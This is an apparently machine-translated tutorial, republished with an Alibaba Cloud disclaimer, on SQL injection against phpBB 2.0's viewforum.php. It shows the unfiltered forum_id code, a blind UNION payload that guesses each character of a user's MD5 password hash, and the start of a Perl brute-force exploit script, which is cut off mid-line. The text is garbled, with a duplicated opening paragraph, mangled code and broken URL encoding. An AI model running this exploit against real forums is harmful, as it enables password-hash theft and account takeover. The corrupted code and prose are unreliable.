It is difficult to see a complete article about php injection and use code on the Internet for php injection instances. so I have had mysql and php hard for a few weeks, let's talk about my recess. I hope it will help you! I believe everyone is familiar with asp injection, and php injection is more difficult than asp, because the magic_gpc option of php is indeed a headache and should not appear in injection.
It is difficult to see a complete article about php injection and use code on the Internet for php injection instances. so I have had mysql and php hard for a few weeks, let's talk about my recess. I hope it will help you!
I believe that you are already very familiar with asp injection, and php injection is more difficult than asp, because the magic_gpc option of php is indeed a headache, so do not use quotation marks in injection, most php is combined with mysql, and the functional disadvantages of mysql prevent SQL njection attacks to some extent from the perspective of another person. I will give an example here, taking phpbb2.0 as an example:
One variable in viewforum. php is not filtered:
If (isset ($ HTTP_GET_VARS {
$ Forum_id = (isset ($ HTTP_GET_VARS
($ HTTP_POST_VARS }
Else if (isset ($ HTTP_GET_VARS ['forum '])
{
$ Forum_id = $ HTTP_GET_VARS ['forum'];
}
Else
{
$ Forum_id = ';
}
This is the forum, which is directly put into the query below:
If (! Empty ($ forum_id ))
{
$ SQL = "SELECT *
FROM ". FORUMS_TABLE ."
WHERE forum_id = $ forum_id ";
If (! ($ Result = $ db-> SQL _query ($ SQL )))
{
Message_die (GENERAL_ERROR, 'could not obtain forums information', ', _ LINE __, _ FILE __, $ SQL );
}
}
Else
{
Message_die (GENERAL_MESSAGE, 'Forum _ not_exist ');
}
If it is asp, I believe many people will inject it. if the forum specified by forum_id does not exist, $ result will be null. Therefore, the information of cocould not obtain forums information will be returned, so the following code cannot be executed.
//
// If the query doesn't return any rows this isn' t a valid forum. Inform
// The user.
//
If (! ($ Forum_row = $ db-> SQL _fetchrow ($ result )))
{
Message_die (GENERAL_MESSAGE, 'Forum _ not_exist ');
}
The key is the line with the asterisk. here is a function session_pagestart ($ user_ip, $ thispage_id), which is a function defined in session. php.
Long, it will not be completely pasted out. if you are interested, you can check it yourself. The key is that this function also calls session_begin (). the function call is as follows: session_begin ($ user_id, $ user_ip,
$ Thispage_id, TRUE), which is also defined in this file, with the following code
$ SQL = "UPDATE". SESSIONS_TABLE ."
SET session_user_id = $ user_id, session_start = $ current_time, session_time = $ current_time, session_page =
Here, session_page defines an integer in mysql ?? $ Page_id, that is, $ forum_id. if it is not an integer, an Error is reported, and an Error occurs.
Creating new session: session_begin prompt, so it is very important to specify this $ forum_id value, so I will specify it as:-1% 20 union % 20 select % ,,1, 2%, from % 20phpbb_users % 20 where % 20user_id = 20and % 20ord (substring (user_password,) = 57, no quotation marks! Although the specified forum_id does not exist, the returned query result may not be null. this is to guess whether the ascii value of the first password of user_id is 57, if yes, the $ result in the first piece of code in the article may not be empty, so the problematic function ession_pagestart is executed. if it is not an integer, an error will occur, the Error creating new session: session_begin is displayed, indicating that you guessed the first place. the other places are similar.
Without this error message, I think it is difficult to determine whether the injection is successful even if the injection is successful. it seems that the error message is helpful. the analysis is here, and a piece of test code is attached below. this code can be used to guess other similar md5 passwords with slight modifications. here I use the English version of the return condition, for Chinese and other languages, you only need to change the return condition.
Use HTTP: Request: Common;
Use HTTP: Response;
Use LWP: UserAgent;
$ Ua = new LWP: UserAgent;
Print "************************ n ";
Print "phpbb viewforum. php expn ";
Print "code by pinkeyesn ";
Print "www. icehack. comn ";
Print "************************* n ";
Print "please enter the weak file's url: n ";
Print "e.g. http: // 192.168.1.4/phpBB2/viewforum. phpn ";
$ Adr = ;
Chomp ($ adr );
Print "please enter the user_id that you want to crackn ";
$ U = ;
Chomp ($ u );
Print "work starting, please wait! N ";
@ Pink = (48 .. 57 );
@ Pink = (@ pink, 97 .. 102 );
For ($ j = 1; $ j <= 32; $ j ++ ){
For ($ I = 0; $ I <@ pink; $ I ++ ){
$ Url = $ adr ."? Forum =-1% 20 union % 20 select %, from % 20phpbb_users % 20 where %
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
